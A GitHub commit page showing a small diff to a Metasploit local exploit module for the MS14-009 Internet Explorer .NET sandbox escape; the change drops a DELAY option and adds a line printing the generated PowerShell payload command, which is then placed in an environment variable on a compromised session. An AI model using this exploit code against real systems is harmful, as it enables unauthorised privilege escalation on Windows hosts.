Skip to content

Commit b8a2cf7

Browse files
committed
Do test
1 parent 05ed234 commit b8a2cf7

File tree

2 files changed

+1
-5
lines changed

2 files changed

+1
-5
lines changed
0 Bytes
Binary file not shown.

modules/exploits/windows/local/ms14_009_ie_dfsvc.rb

Lines changed: 1 addition & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -64,11 +64,6 @@ def initialize(info={})
6464
['URL', 'https://github.com/tyranid/IE11SandboxEscapes']
6565
]
6666
))
67-
68-
register_options(
69-
[
70-
OptInt.new('DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10])
71-
])
7267
end
7368

7469
def check
@@ -156,6 +151,7 @@ def exploit
156151
print_good(".NET looks vulnerable, exploiting...")
157152

158153
cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip
154+
print_status cmd
159155
session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd)
160156

161157
temp = get_env('TEMP')

0 commit comments

Comments
 (0)